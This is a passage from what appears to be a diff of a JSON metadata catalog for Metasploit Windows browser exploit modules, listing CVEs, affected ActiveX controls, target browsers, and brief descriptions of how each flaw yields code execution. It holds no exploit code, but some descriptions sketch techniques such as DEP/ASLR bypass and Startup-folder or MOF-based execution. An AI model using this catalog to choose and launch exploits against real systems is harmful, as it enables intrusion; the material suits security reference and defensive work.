When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-4321", - "BID-44966", - "OSVDB-69357", - "ZDI-10-256", - "EDB-16014", - "URL-http://www.novell.com/support/viewContent.do?externalId=7007234" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_getdriversettings_2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_target_frame": { - "name": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_target_frame", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-08", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. 
When\n passing an overly long string via the \"target-frame\" parameter to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.", - "references": [ - "CVE-2009-1568", - "BID-37242", - "OSVDB-60803", - "URL-http://web.archive.org/web/20091213033630/http://secunia.com:80/advisories/37169" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "iPrint 5.30 Windows Client" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_target_frame.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_target_frame", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ntr_activex_check_bof": { - "name": "NTR ActiveX Control Check() Method Buffer Overflow", - "fullname": "exploit/windows/browser/ntr_activex_check_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-11", - "type": "exploit", - "author": [ - "Carsten Eiram", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in NTR ActiveX 1.1.8. The\n vulnerability exists in the Check() method, due to the insecure usage of strcat to\n build a URL using the bstrParams parameter contents (note: this is also the reason\n why the module won't allow you to modify the URIPATH), which leads to code execution\n under the context of the user visiting a malicious web page. 
In order to bypass\n DEP and ASLR on Windows Vista and Windows 7 JRE 6 is needed.", - "references": [ - "CVE-2012-0266", - "OSVDB-78252", - "BID-51374", - "URL-http://web.archive.org/web/20120514113631/http://secunia.com/secunia_research/2012-1/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/ntr_activex_check_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/ntr_activex_check_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ntr_activex_stopmodule": { - "name": "NTR ActiveX Control StopModule() Remote Code Execution", - "fullname": "exploit/windows/browser/ntr_activex_stopmodule", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-11", - "type": "exploit", - "author": [ - "Carsten Eiram", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in the NTR ActiveX 1.1.8. 
The\n vulnerability exists in the StopModule() method, where the lModule parameter is\n used to dereference memory to get a function pointer, which leads to code execution\n under the context of the user visiting a malicious web page.", - "references": [ - "CVE-2012-0267", - "OSVDB-78253", - "BID-51374", - "URL-http://web.archive.org/web/20120122095846/http://secunia.com:80/secunia_research/2012-2" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 7 on Windows Vista" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/ntr_activex_stopmodule.rb", - "is_install_path": true, - "ref_name": "windows/browser/ntr_activex_stopmodule", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/oracle_autovue_setmarkupmode": { - "name": "Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow", - "fullname": "exploit/windows/browser/oracle_autovue_setmarkupmode", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-18", - "type": "exploit", - "author": [ - "Brian Gorenc", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in the AutoVue.ocx ActiveX control.\n The vulnerability, due to the insecure usage of an strcpy like function in the\n SetMarkupMode method, when handling a specially crafted sMarkup argument, allows\n to trigger a stack based buffer overflow which leads to code execution under the\n context of the user visiting a malicious web page.\n\n The module has been successfully tested against Oracle AutoVue Desktop Version\n 20.0.0 (AutoVue.ocx 20.0.0.7330) on IE 6, 7, 8 and 9 (Java 6 needed to DEP and\n ASLR bypass).", - "references": [ - "CVE-2012-0549", - "BID-53077", - "OSVDB-81439", - 
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05", - "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html", - "URL-https://www.rapid7.com/blog/post/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3 / Windows Vista SP2", - "IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2", - "IE 9 with Java 6 on Windows 7 SP1" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb", - "is_install_path": true, - "ref_name": "windows/browser/oracle_autovue_setmarkupmode", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/oracle_dc_submittoexpress": { - "name": "Oracle Document Capture 10g ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/oracle_dc_submittoexpress", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-08-28", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n Oracle Document Capture 10g comes bundled with a third party ActiveX control\n emsmtp.dll (6.0.1.0). 
When passing an overly long string to the method \"SubmitToExpress\"\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-4607", - "OSVDB-38335", - "BID-25467", - "US-CERT-VU-281977" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb", - "is_install_path": true, - "ref_name": "windows/browser/oracle_dc_submittoexpress", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/oracle_webcenter_checkoutandopen": { - "name": "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution", - "fullname": "exploit/windows/browser/oracle_webcenter_checkoutandopen", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-04-16", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in the Oracle WebCenter Content\n CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where\n user controlled input is used to call ShellExecuteExW(). This module abuses the\n control to execute an arbitrary HTA from a remote location. 
This module has been\n tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle\n WebCenter Content 11.1.1.6.0.", - "references": [ - "CVE-2013-1559", - "OSVDB-92386", - "BID-59122", - "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html", - "ZDI-13-094" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb", - "is_install_path": true, - "ref_name": "windows/browser/oracle_webcenter_checkoutandopen", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/browser/orbit_connecting": { - "name": "Orbit Downloader Connecting Log Creation Buffer Overflow", - "fullname": "exploit/windows/browser/orbit_connecting", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. 
When an\n attacker serves up a malicious web site, arbitrary code may be executed.\n The PAYLOAD windows/shell_bind_tcp works best.", - "references": [ - "CVE-2009-0187", - "OSVDB-52294", - "BID-33894" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / IE 6.0 SP0-SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/orbit_connecting.rb", - "is_install_path": true, - "ref_name": "windows/browser/orbit_connecting", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ovftool_format_string": { - "name": "VMWare OVF Tools Format String Vulnerability", - "fullname": "exploit/windows/browser/ovftool_format_string", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-08", - "type": "exploit", - "author": [ - "Jeremy Brown", - "juan vazquez " - ], - "description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. 
The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.", - "references": [ - "CVE-2012-3569", - "OSVDB-87117", - "BID-56468", - "URL-https://www.vmware.com/security/advisories/VMSA-2012-0015.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VMWare OVF Tools 2.1 on Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/browser/ovftool_format_string.rb", - "is_install_path": true, - "ref_name": "windows/browser/ovftool_format_string", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/pcvue_func": { - "name": "PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability", - "fullname": "exploit/windows/browser/pcvue_func", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-10-05", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "mr_me ", - "TecR0c " - ], - "description": "This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0.\n By setting a dword value for the SaveObject() or LoadObject(), an attacker can\n overwrite a function pointer and execute arbitrary code.", - "references": [ - "CVE-2011-4044", - "OSVDB-77561", - "BID-49795", - "URL-http://aluigi.altervista.org/adv/pcvue_1-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Internet Explorer 6 / Internet Explorer 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/pcvue_func.rb", - "is_install_path": true, - "ref_name": "windows/browser/pcvue_func", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/browser/persits_xupload_traversal": { - "name": "Persits XUpload ActiveX MakeHttpRequest Directory Traversal", - "fullname": "exploit/windows/browser/persits_xupload_traversal", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-09-29", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a directory traversal in Persits Software Inc's\n XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.\n By passing a string containing \"..\\\" sequences to the MakeHttpRequest method,\n an attacker is able to write arbitrary files to arbitrary locations on disk.\n\n Code execution occurs by writing to the All Users Startup Programs directory.\n You may want to combine this module with the use of exploit/multi/handler since a\n user would have to log for the payload to execute.", - "references": [ - "CVE-2009-3693", - "OSVDB-60001" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/persits_xupload_traversal.rb", - "is_install_path": true, - "ref_name": "windows/browser/persits_xupload_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/quickr_qp2_bof": { - "name": "IBM Lotus QuickR qp2 ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/quickr_qp2_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-23", - "type": "exploit", - "author": [ - "Gaurav Baruah", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. 
The affected ActiveX is\n provided by the qp2.dll installed with the IBM Lotus Quickr product.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module\n msvcr71.dll is used. This one is installed with the qp2 ActiveX.", - "references": [ - "CVE-2012-2176", - "OSVDB-82166", - "BID-53678", - "ZDI-12-134", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21596191" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/quickr_qp2_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/quickr_qp2_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/real_arcade_installerdlg": { - "name": "Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution", - "fullname": "exploit/windows/browser/real_arcade_installerdlg", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-04-03", - "type": "exploit", - "author": [ - "rgod", - "sinn3r " - ], - "description": "This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. 
The \"exec\"\n function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n on the victim machine.", - "references": [ - "OSVDB-71559", - "EDB-17105" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/real_arcade_installerdlg.rb", - "is_install_path": true, - "ref_name": "windows/browser/real_arcade_installerdlg", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/realplayer_cdda_uri": { - "name": "RealNetworks RealPlayer CDDA URI Initialization Vulnerability", - "fullname": "exploit/windows/browser/realplayer_cdda_uri", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-11-15", - "type": "exploit", - "author": [ - "bannedit ", - "sinn3r " - ], - "description": "This module exploits an initialization flaw within RealPlayer 11/11.1 and\n RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object\n initialization failure. 
However, this failure is improperly handled and\n uninitialized memory executed.", - "references": [ - "CVE-2010-3747", - "OSVDB-68673", - "BID-44144", - "ZDI-10-210", - "URL-http://service.real.com/realplayer/security/10152010_player/en/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "RealPlayer SP 1.0 - 1.1.4 Universal", - "RealPlayer 11.0 - 11.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/realplayer_cdda_uri.rb", - "is_install_path": true, - "ref_name": "windows/browser/realplayer_cdda_uri", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/realplayer_console": { - "name": "RealPlayer rmoc3260.dll ActiveX Control Heap Corruption", - "fullname": "exploit/windows/browser/realplayer_console", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-03-08", - "type": "exploit", - "author": [ - "Elazar Broad " - ], - "description": "This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.\n By sending a specially crafted string to the 'Console' property\n in the rmoc3260.dll control, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2008-1309", - "OSVDB-42946", - "BID-28157", - "URL-http://web.archive.org/web/20080313103656/http://secunia.com:80/advisories/29315/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/realplayer_console.rb", - "is_install_path": true, - "ref_name": "windows/browser/realplayer_console", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": 
false, - "needs_cleanup": null - }, - "exploit_windows/browser/realplayer_import": { - "name": "RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow", - "fullname": "exploit/windows/browser/realplayer_import", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-10-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and\n RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the \"Import()\"\n method, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-5601", - "OSVDB-41430", - "BID-26130" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE / RealOne Player 2 (6.0.11.853)", - "IE / RealPlayer 10.5 (6.0.12.1483)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/realplayer_import.rb", - "is_install_path": true, - "ref_name": "windows/browser/realplayer_import", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/realplayer_qcp": { - "name": "RealNetworks Realplayer QCP Parsing Heap Overflow", - "fullname": "exploit/windows/browser/realplayer_qcp", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-08-16", - "type": "exploit", - "author": [ - "Sean de Regge", - "juan vazquez " - ], - "description": "This module exploits a heap overflow in Realplayer when handling a .QCP file.\n The specific flaw exists within qcpfformat.dll. 
A static 256 byte buffer is\n allocated on the heap and user-supplied data from the file is copied within a\n memory copy loop.\n\n This allows a remote attacker to execute arbitrary code running in the context\n of the web browser via a .QCP file with a specially crafted \"fmt\" chunk.\n At this moment this module exploits the flaw on Windows XP IE6, IE7.", - "references": [ - "CVE-2011-2950", - "OSVDB-74549", - "BID-49172", - "ZDI-11-265", - "URL-http://service.real.com/realplayer/security/08162011_player/en/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 6 on XP SP3", - "Internet Explorer 7 on XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/realplayer_qcp.rb", - "is_install_path": true, - "ref_name": "windows/browser/realplayer_qcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/realplayer_smil": { - "name": "RealNetworks RealPlayer SMIL Buffer Overflow", - "fullname": "exploit/windows/browser/realplayer_smil", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-03-01", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.\n By creating a URL link to a malicious SMIL file, a remote attacker could\n overflow a buffer and execute arbitrary code.\n When using this module, be sure to set the URIPATH with an extension of '.smil'.\n This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8\n build 6.0.9.584.", - "references": [ - "CVE-2005-0455", - "OSVDB-14305", - "BID-12698" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "RealPlayer 10/8 on Windows 2000 SP0-SP4 
English", - "RealPlayer 10/8 on Windows XP PRO SP0-SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/realplayer_smil.rb", - "is_install_path": true, - "ref_name": "windows/browser/realplayer_smil", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/roxio_cineplayer": { - "name": "Roxio CinePlayer ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/roxio_cineplayer", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-04-11", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a stack-based buffer overflow in SonicPlayer ActiveX\n control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.\n By setting an overly long value to 'DiskType', an attacker can overrun\n a buffer and execute arbitrary code.", - "references": [ - "CVE-2007-1559", - "OSVDB-34779", - "BID-23412" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/roxio_cineplayer.rb", - "is_install_path": true, - "ref_name": "windows/browser/roxio_cineplayer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/safari_xslt_output": { - "name": "Apple Safari Webkit libxslt Arbitrary File Creation", - "fullname": "exploit/windows/browser/safari_xslt_output", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-07-20", - "type": "exploit", - "author": [ - "Nicolas Gregoire" - ], - "description": "This module exploits a file creation vulnerability in the Webkit\n rendering engine. 
It is possible to redirect the output of a XSLT\n transformation to an arbitrary file. The content of the created file must be\n ASCII or UTF-8. The destination path can be relative or absolute. This module\n has been tested on Safari and Maxthon. Code execution can be achieved by first\n uploading the payload to the remote machine in VBS format, and then upload a MOF\n file, which enables Windows Management Instrumentation service to execute the VBS.", - "references": [ - "CVE-2011-1774", - "OSVDB-74017", - "URL-http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/safari_xslt_output.rb", - "is_install_path": true, - "ref_name": "windows/browser/safari_xslt_output", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/samsung_neti_wiewer_backuptoavi_bof": { - "name": "Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow", - "fullname": "exploit/windows/browser/samsung_neti_wiewer_backuptoavi_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the CNC_Ctrl.dll ActiveX control installed\n with the Samsung NET-i viewer 1.37.\n\n Specifically, when supplying a long string for the fname parameter to the\n BackupToAvi method, an integer overflow occurs, which leads to a posterior buffer\n overflow due to the use of memcpy with an incorrect size, resulting in remote code\n execution under the context of the user.", - "references": [ - "CVE-2012-4333", - "OSVDB-81453", - "BID-53193", - 
"URL-http://aluigi.altervista.org/adv/netiware_1-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/samsung_neti_wiewer_backuptoavi_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/samsung_security_manager_put": { - "name": "Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution", - "fullname": "exploit/windows/browser/samsung_security_manager_put", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-08-05", - "type": "exploit", - "author": [ - "mr_me " - ], - "description": "This is an exploit against Samsung Security Manager that bypasses the patch in ZDI-15-156 & ZDI-16-481\n by exploiting the vulnerability against the client-side. This exploit has been tested successfully using\n IE, FireFox and Chrome by abusing a GET request XSS to bypass CORS and reach the vulnerable PUT. 
Finally\n a traversal is used in the PUT request to upload the code just where we want it and gain RCE as SYSTEM.", - "references": [ - "URL-http://www.zerodayinitiative.com/advisories/ZDI-15-156/", - "URL-http://www.zerodayinitiative.com/advisories/ZDI-16-481/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Samsung Security Manager 1.32 & 1.4 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/samsung_security_manager_put.rb", - "is_install_path": true, - "ref_name": "windows/browser/samsung_security_manager_put", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/browser/sapgui_saveviewtosessionfile": { - "name": "SAP AG SAPgui EAI WebViewer3D Buffer Overflow", - "fullname": "exploit/windows/browser/sapgui_saveviewtosessionfile", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-03-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Siemens Unigraphics Solutions\n Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled\n with SAPgui. 
When passing an overly long string the SaveViewToSessionFile()\n method, arbitrary code may be executed.", - "references": [ - "CVE-2007-4475", - "OSVDB-53066", - "US-CERT-VU-985449" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb", - "is_install_path": true, - "ref_name": "windows/browser/sapgui_saveviewtosessionfile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/siemens_solid_edge_selistctrlx": { - "name": "Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution", - "fullname": "exploit/windows/browser/siemens_solid_edge_selistctrlx", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-26", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits the SEListCtrlX ActiveX installed with the Siemens Solid Edge product.\n The vulnerability exists on several APIs provided by the control, where user supplied input\n is handled as a memory pointer without proper validation, allowing an attacker to read and\n corrupt memory from the target process. 
This module abuses the methods NumChildren() and\n DeleteItem() in order to achieve memory info leak and remote code execution respectively.\n This module has been tested successfully on IE6-IE9 on Windows XP SP3 and Windows 7 SP1,\n using Solid Edge 10.4.", - "references": [ - "OSVDB-93696", - "EDB-25712" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb", - "is_install_path": true, - "ref_name": "windows/browser/siemens_solid_edge_selistctrlx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/softartisans_getdrivename": { - "name": "SoftArtisans XFile FileManager ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/softartisans_getdrivename", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-08-25", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control\n (SAFmgPwd.dll 2.0.5.3). 
